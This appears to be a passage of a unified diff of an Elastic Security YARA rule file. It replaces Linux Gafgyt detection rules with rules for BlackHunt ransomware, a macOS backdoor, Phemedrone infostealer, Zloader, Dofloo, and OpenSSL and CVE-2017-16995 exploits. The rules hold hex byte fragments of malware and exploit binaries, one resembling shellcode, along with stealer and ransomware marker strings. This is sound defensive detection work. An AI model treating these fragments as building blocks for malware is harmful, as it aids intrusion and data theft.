"2021-01-12" - modified = "2021-09-16" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L832-L850" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "899c072730590003b98278bdda21c15ecaa2f49ad51e417ed59e88caf054a72d" - logic_hash = "6f40f868d20f0125721eb2a7934b356d69b695d4a558155a2ddcd0107d3f8c30" + id = "62e11c64-fc7d-4a0a-9d72-ad53ec3987ff" + date = "2021-06-08" + modified = "2021-07-28" + reference = "https://cujo.com/upx-anti-unpacking-techniques-in-iot-malware/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Packer_Patched_UPX.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "02f81a1e1edcb9032a1d7256a002b11e1e864b2e9989f5d24ea1c9b507895669" + logic_hash = "cb576fdd59c255234a96397460b81cbb2deeb38befaed101749b7bb515624028" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "6f24b67d0a6a4fc4e1cfea5a5414b82af1332a3e6074eb2178aee6b27702b407" - severity = 100 + tags = "FILE" + fingerprint = "3297b5c63e70c557e71b739428b453039b142e1e04c2ab15eea4627d023b686d" + severity = 60 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "linux" strings: - $a = { 83 7D 18 00 74 25 8B 45 1C 83 E0 02 85 C0 74 1B C7 44 24 04 2D 00 } + $a = { 55 50 58 21 [4] 00 00 00 00 00 00 00 00 00 00 00 00 } condition: - all of them + all of them and $a in (0..255) } -rule ELASTIC_Linux_Trojan_Gafgyt_620087B9 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Blackhunt_7B46Cb9C : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Ransomware Blackhunt (Windows.Ransomware.BlackHunt)" author = "Elastic Security" - id = "620087b9-c87d-4752-89e8-ca1c16486b28" - date = "2021-01-12" - modified = "2021-09-16" + id = "7b46cb9c-4601-4be0-a2de-6a4f27d1a446" + date = "2024-03-12" + modified = "2024-03-21" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L852-L870" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961" - logic_hash = "411451ea326498a25af8be5cd43fe0b98973af354706268c89828b88ece5e497" - score = 75 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_BlackHunt.yar#L1-L25" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6c4e968c9b53906ba0e86a41eccdabe2b736238cb126852023e15850e956293d" + logic_hash = "97bb8436574fd814d8278e5a7043e011d0e4f9a7dd9df5e67605f28ac1af1e74" + score = 50 quality = 75 tags = "FILE, MEMORY" - fingerprint = "06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307" + fingerprint = "1e46e2de840bfd557147e686eb00c350d00f6d1c6b2b8d1df98165c73cbe89ba" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 48 89 D8 48 83 C8 01 EB 04 48 8B 76 10 48 3B 46 08 72 F6 48 8B } + $a1 = "#BlackHunt_ReadMe.txt" wide fullword + $a2 = "#BlackHunt_Private.key" wide fullword + $a3 = "#BlackHunt_ID.txt" wide fullword + $a4 = "BLACK_HUNT_MUTEX" ascii fullword + $a5 = "BlackKeys" ascii fullword + $a6 = "ENCRYPTED VOLUME : %dGB" ascii fullword + $a7 = "RUNNING TIME : %02dm:%02ds" ascii fullword condition: - all of them + 4 of them } -rule ELASTIC_Linux_Trojan_Gafgyt_Dd0D6173 : FILE MEMORY +rule ELASTIC_Macos_Backdoor_Fakeflashlxk_06Fd8071 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Macos Backdoor Fakeflashlxk (MacOS.Backdoor.Fakeflashlxk)" author = "Elastic Security" - id = "dd0d6173-b863-45cf-9348-3375a4e624cf" - date = "2021-01-12" - modified = "2021-09-16" + id = "06fd8071-0370-4ae8-819a-846fa0a79b3d" + date = "2021-11-11" + modified = "2022-07-22" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L872-L890" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "c5a317d0d8470814ff343ce78ad2428ebb3f036763fcf703a589b6c4d33a3ec6" - logic_hash = "7061edef1981e2b93bcdd8be47c0f6067acc140a543eed748bf0513f182e0a59" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Backdoor_Fakeflashlxk.yar#L1-L21" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "107f844f19e638866d8249e6f735daf650168a48a322d39e39d5e36cfc1c8659" + logic_hash = "853d44465a472786bb48bbe1009e0ff925f79e4fd72f0eac537dd271c1ec3703" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5e2cb111c2b712951b71166111d339724b4f52b93f90cb474f1e67598212605f" + fingerprint = "a0e6763428616b46536c6a4eb080bae0cc58ef27678616aa432eb43a3d9c77a1" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "macos" strings: - $a = { 55 F8 8B 45 F0 89 42 0C 48 8B 55 F8 8B 45 F4 89 42 10 C9 C3 55 48 } + $s1 = "/Users/lxk/Library/Developer/Xcode/DerivedData" + $s2 = "Desktop/SafariFlashActivity/SafariFlashActivity/SafariFlashActivity/" + $s3 = "/Debug/SafariFlashActivity.build/Objects-normal/x86_64/AppDelegate.o" condition: - all of them + 2 of them } -rule ELASTIC_Linux_Trojan_Gafgyt_779E142F : FILE MEMORY +rule ELASTIC_Windows_Infostealer_Phemedronestealer_Bed8Ea8A : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Infostealer Phemedronestealer (Windows.Infostealer.PhemedroneStealer)" author = "Elastic Security" - id = "779e142f-b867-46e6-b1fb-9105976f42fd" - date = "2021-01-12" - modified = "2021-09-16" + id = "bed8ea8a-f2a3-4a51-ae57-4986da4d21aa" + date = "2024-03-21" + modified = "2024-05-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L892-L910" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df" - logic_hash = "80ba5a1cf333fafc6a1d7823ca4a8d5c30c1c07a01d6d681c22dd29e197089f1" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Infostealer_PhemedroneStealer.yar#L1-L30" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "38279fdad25c7972be9426cadb5ad5e3ee7e9761b0a41ed617945cb9a3713702" + logic_hash = "88fc33abfe6c7a611aa0c354645b06e9e74121ffc9a5acd20b4d3a59287489d6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "83377b6fa77fda4544c409487d2d2c1ddcef8f7d4120f49a18888c7536f3969f" + fingerprint = "29702a2dc8b20c230ffef00dfff725133b707e35523e075ff85484a20da3c760" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { EC 8B 45 E8 83 E0 02 85 C0 74 07 C7 45 D8 30 00 00 00 8B 45 E8 83 } + $a1 = "b_" + $a2 = "b_" + $a3 = "b_" + $a4 = "b_" + $a5 = "b_" + $a6 = "b_" + $b1 = "Phemedrone.Senders" + $b2 = "Phemedrone.Protections" + $b3 = "Phemedrone.Extensions" + $b4 = "Phemedrone.Cryptography" + $b5 = "Phemedrone-Report.zip" + $b6 = "Phemedrone Stealer Report" condition: - all of them + all of ($a*) or all of ($b*) } -rule ELASTIC_Linux_Trojan_Gafgyt_Cf84C9F2 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Zloader_5Dd0A0Bf : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Zloader (Windows.Trojan.Zloader)" author = "Elastic Security" - id = "cf84c9f2-7435-4faf-8c5f-d14945ffad7a" - date = "2021-01-12" - modified = "2021-09-16" + id = "5dd0a0bf-20e4-4c52-b9d9-c157e871b06b" + date = "2022-03-03" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L912-L930" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "275cbd5d3b3d8c521649b95122d90d1ca9b7ae1958b721bdc158aaa2d31d49df" - logic_hash = "9af164ece7e7e0f33dc32f18735a8f655593ae6cde34e05108f3221b71aa8676" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Zloader.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "161e657587361b29cdb883a6836566a946d9d3e5175e166a9fe54981d0c667fa" + logic_hash = "1446a4147e1b06fa66907de857011079c55a8e6bf84276eb8518d33468ba1f83" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bb766b356c3e8706740e3bb9b4a7171d8eb5137e09fc7ab6952412fa55e2dcfc" + fingerprint = "06545df6c556adf8a6844724e77d005c0299b544f21df2ea44bb9679964dbb9f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 55 48 89 E5 48 83 EC 30 48 89 7D E8 89 75 E4 89 55 E0 C7 45 F8 01 00 } + $a = { B6 08 89 CA 80 C2 F7 80 FA 05 72 F2 80 F9 20 74 ED 03 5D 0C 8D } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_0Cd591Cd : FILE MEMORY +rule ELASTIC_Windows_Trojan_Zloader_4Fe0F7F1 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Zloader (Windows.Trojan.Zloader)" author = "Elastic Security" - id = "0cd591cd-c348-4c3a-a895-2063cf892cda" - date = "2021-01-12" - modified = "2021-09-16" + id = "4fe0f7f1-93c6-4397-acd5-1557608efaf4" + date = "2022-03-03" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L932-L949" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "4300bdd173dfb33ca34c0f2fe4fa6ee071e99d5db201262e914721aad0ad433b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Zloader.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "161e657587361b29cdb883a6836566a946d9d3e5175e166a9fe54981d0c667fa" + logic_hash = "b20fafc9db08c7668b49e18f45632594c3a69ec65fe865e79379c544fc424f8d" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b" + fingerprint = "f340f41cc69930d24ffdae484d1080cd9ce5cb5e7720868c956923a5b8e6c9b1" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 4E F8 48 8D 4E D8 49 8D 42 E0 48 83 C7 03 EB 6B 4C 8B 46 F8 48 8D } + $a = { 08 8B 75 F0 85 DB 8D 7D 94 89 45 E8 0F 45 FB 31 DB 85 F6 0F } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_859042A0 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Zloader_363C65Ed : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Zloader (Windows.Trojan.Zloader)" author = "Elastic Security" - id = "859042a0-a424-4c83-944b-ed182b342998" - date = "2021-01-12" - modified = "2021-09-16" + id = "363c65ed-e394-4a40-9c2a-a6f6fd284ed3" + date = "2022-03-03" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L951-L969" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "41615d3f3f27f04669166fdee3996d77890016304ee87851a5f90804d6d4a0b0" - logic_hash = "b8daa4a136a6511472703687fe56fbca2bd005a1373802a46c8d211b6d039d75" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Zloader.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "161e657587361b29cdb883a6836566a946d9d3e5175e166a9fe54981d0c667fa" + logic_hash = "d3c530f9929db709067a9e1cc59b9cda9dcd8e19352c79ddaf7af6c91b242afd" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a27bcaa16edceda3dc5a80803372c907a7efd00736c7859c5a9d6a2cf56a8eec" + fingerprint = "33ae4cee122269f4342a3fd829236cbd303d8821b548ab93bbebc9dee3eb67f2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 45 A8 48 83 C0 01 48 89 45 C0 EB 05 48 83 45 C0 01 48 8B 45 C0 0F } + $a = { 04 8D 4D E4 8D 55 E8 6A 00 6A 00 51 6A 00 6A 00 50 52 57 53 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_33B4111A : FILE MEMORY +rule ELASTIC_Windows_Trojan_Zloader_79535191 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Windows Trojan Zloader (Windows.Trojan.Zloader)" author = "Elastic Security" - id = "33b4111a-e59e-48db-9d74-34ca44fcd9f5" - date = "2021-01-12" - modified = "2021-09-16" + id = "79535191-59df-4c78-9f62-b8614ef992d3" + date = "2022-03-03" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L971-L989" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961" - logic_hash = "a08c0f7be26e2e9abfaa392712895bb3ce1d12583da4060ebe41e1a9c1491b7c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Zloader.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "161e657587361b29cdb883a6836566a946d9d3e5175e166a9fe54981d0c667fa" + logic_hash = "c398a8ca46c6fe3e59481a092867be77a94809b1568cea918aa6450374063857" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e" + fingerprint = "ee3c4cf0d694119acfdc945a964e4fc0f51355eabca900ffbcc21aec0b3e1e3c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { C1 83 E1 0F 74 1A B8 10 00 00 00 48 29 C8 48 8D 0C 02 48 89 DA 48 } + $a = { 28 4B 74 26 8B 46 FC 85 C0 74 F3 8B 4E F4 8B 16 39 C8 0F 47 C1 8B } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_4F43B164 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Openssl_47C6Fad7 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Exploit Openssl (Linux.Exploit.Openssl)" author = "Elastic Security" - id = "4f43b164-686d-4b73-b532-45e2df992b33" - date = "2021-01-12" + id = "47c6fad7-0582-4a7a-9c51-68830e6b6132" + date = "2021-04-06" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L991-L1009" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "f0fdb3de75f85e199766bbb39722865cac578cde754afa2d2f065ef028eec788" - logic_hash = "79a17e70e9b7af6e53f62211c33355a4c46a82e7c4e80c20ffe9684e24155808" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Openssl.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8024af0931dff24b5444f0b06a27366a776014358aa0b7fc073030958f863ef8" + logic_hash = "4c60071ecd7b826e692710ae11b09be30e7df5833bcaa8642fea014e12b9abd7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "35a885850a06e7991c3a8612bbcdfc279b87e4ca549723192d3011a1e0a81640" + fingerprint = "bde819830cc991269275ce5de2db50489368c821271aaa397ab914011f2fcb91" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -72721,27 +73094,28 @@ rule ELASTIC_Linux_Trojan_Gafgyt_4F43B164 : FILE MEMORY os = "linux" strings: - $a = { 46 00 4B 49 4C 4C 53 55 42 00 4B 49 4C 4C 53 55 42 20 3C 73 } + $a = { 31 C9 F7 E1 51 5B B0 A4 CD 80 31 C0 50 68 2F } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_E4A1982B : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2017_16995_0C81A317 : FILE MEMORY CVE_2017_16995 { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Exploit Cve 2017 16995 (Linux.Exploit.CVE-2017-16995)" author = "Elastic Security" - id = "e4a1982b-928a-4da5-b497-cedc1d26e845" + id = "0c81a317-b296-4cda-839c-a37903e86786" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1011-L1028" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "4cd7aa205b3571cffca208e315d6311fa92a5993e2a8e40d342d6184811f42f0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2017_16995.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "48d927b4b18a03dfbce54bb5f4518869773737e449301ba2477eb797afbb9972" + logic_hash = "cdd6b309a1e802f1251d726b0ea74e3d11fdd10d1d0bfa4c6f3d802f819368ec" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "d9f852c28433128b0fd330bee35f7bd4aada5226e9ca865fe5cd8cca52b2a622" + tags = "FILE, MEMORY, CVE-2017-16995" + fingerprint = "40d192607a7237c41c35d90a48cbcfd95a79c0fe7c8017d41389f15a78d620f5" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -72749,28 +73123,28 @@ rule ELASTIC_Linux_Trojan_Gafgyt_E4A1982B : FILE MEMORY os = "linux" strings: - $a = { 8B 45 EC F7 D0 21 D0 33 45 FC C9 C3 55 48 89 E5 48 83 EC 30 48 89 } + $a = { 55 48 89 E5 48 89 7D F8 48 8B 45 F8 48 25 00 C0 FF FF 5D C3 55 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_862C4E0E : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2017_16995_82816Caa : FILE MEMORY CVE_2017_16995 { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Exploit Cve 2017 16995 (Linux.Exploit.CVE-2017-16995)" author = "Elastic Security" - id = "862c4e0e-83a4-458b-8c00-f2f3cf0bf9db" - date = "2021-01-12" - modified = "2021-09-16" + id = "82816caa-2fff-4b71-9544-443e611aacbf" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1030-L1048" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9526277255a8d632355bfe54d53154c9c54a4ab75e3ba24333c73ad0ed7cadb1" - logic_hash = "a1dce44e76f9d2a517c4849c58dfecb07e1ef0d78fddff10af601184d636583f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2017_16995.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "14e6b788db0db57067d9885ab5ff3d3a5749639549d82abd98fa4fcf27000f34" + logic_hash = "3ae00290073d41ff5dba2f677510bf9a9c0ebaed221901eb8b1a8dda08157a46" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "2a6b4f8d8fb4703ed26bdcfbbb5c539dc451c8b90649bee80015c164eae4c281" + tags = "FILE, MEMORY, CVE-2017-16995" + fingerprint = "1a716566946fdd368230c02e2c749b6ce371fa6211be6b3db137af9b117bec87" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -72778,28 +73152,28 @@ rule ELASTIC_Linux_Trojan_Gafgyt_862C4E0E : FILE MEMORY os = "linux" strings: - $a = { 02 89 45 F8 8B 45 F8 C1 E8 10 85 C0 75 E6 8B 45 F8 F7 D0 0F } + $a = { BC 89 45 C0 8B 45 B8 48 98 48 C1 E8 03 89 45 C4 48 8B 45 B0 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_9127F7Be : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2017_16995_5Edb0181 : FILE MEMORY CVE_2017_16995 { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Exploit Cve 2017 16995 (Linux.Exploit.CVE-2017-16995)" author = "Elastic Security" - id = "9127f7be-6e82-46a1-9f11-0b3570b0cd76" - date = "2021-01-12" - modified = "2021-09-16" + id = "5edb0181-dfb1-47e2-873b-0fa3043bee67" + date = "2022-01-05" + modified = "2022-01-26" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1050-L1068" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "899c072730590003b98278bdda21c15ecaa2f49ad51e417ed59e88caf054a72d" - logic_hash = "2b1fa115598561e081dfb9b5f24f6728b0d52cb81ac7933728d81646f461bcae" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2017_16995.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e4df84e1dffbad217d07222314a7e13fd74771a9111d07adc467a89d8ba81127" + logic_hash = "f6eb19329db765938b48021039baaf1b5aeb3240c405ba20ed81863a0fb4b583" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "72c742cb8b11ddf030e10f67e13c0392748dcd970394ec77ace3d2baa705a375" + tags = "FILE, MEMORY, CVE-2017-16995" + fingerprint = "804635a4922830b894ed38f58751f481d389e5bfbea7a50912763952971844e6" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -72807,27 +73181,28 @@ rule ELASTIC_Linux_Trojan_Gafgyt_9127F7Be : FILE MEMORY os = "linux" strings: - $a = { E4 F7 E1 89 D0 C1 E8 03 89 45 E8 8B 45 E8 01 C0 03 45 E8 C1 } + $a = { F8 2F 77 0F 45 89 C2 49 89 D1 41 83 C0 08 4A 8D 54 15 D0 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_0E03B7D3 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Dofloo_Be1973Ed : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Trojan Dofloo (Linux.Trojan.Dofloo)" author = "Elastic Security" - id = "0e03b7d3-a6b0-46a0-920e-c15ee7e723f7" + id = "be1973ed-a0ee-41ca-a752-fb5f990e2096" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Gafgyt.yar#L1070-L1087" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "845be03fac893f8e914aabda5206000dc07947ade0b8f46cc5d58d8458f035f6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Dofloo.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "88d826bac06c29e1b9024baaf90783e15d87d2a5c8c97426cbd5a70ae0f99461" + logic_hash = "65f9daabf44006fe4405032bf93570185248bc62cd287650c68f854b23aa2158" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1bf1f271005328669b3eb4940e2b75eff9fc47208d79a12196fd7ce04bc4dbe8" + fingerprint = "f032f072fd5da9ec4d8d3953bea0f2a236219b99ecfa67e3fac44f2e73f33e9c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -72835,28 +73210,28 @@ rule ELASTIC_Linux_Trojan_Gafgyt_0E03B7D3 : FILE MEMORY os = "linux" strings: - $a = { F5 74 84 32 63 29 5A B2 78 FF F7 FA 0E 51 B3 2F CD 7F 10 FA } + $a = { A8 8B 45 A8 89 45 A4 83 7D A4 00 79 04 83 45 A4 03 8B 45 A4 C1 } condition: all of them } -rule ELASTIC_Linux_Trojan_Gafgyt_32Eb0C81 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Dofloo_1D057993 : FILE MEMORY { meta: - description = "Detects Linux Trojan Gafgyt (Linux.Trojan.Gafgyt)" + description = "Detects Linux Trojan Dofloo (Linux.Trojan.Dofloo)" author = "Elastic Security" - id = "32eb0c81-25af-4670-ab77-07ea7ce1874a" + id = "1d057993-0a46-4014-8ab6-aa9e9d93dfa1" date = "2021-01-12" modified = "2021-09-16" reference = 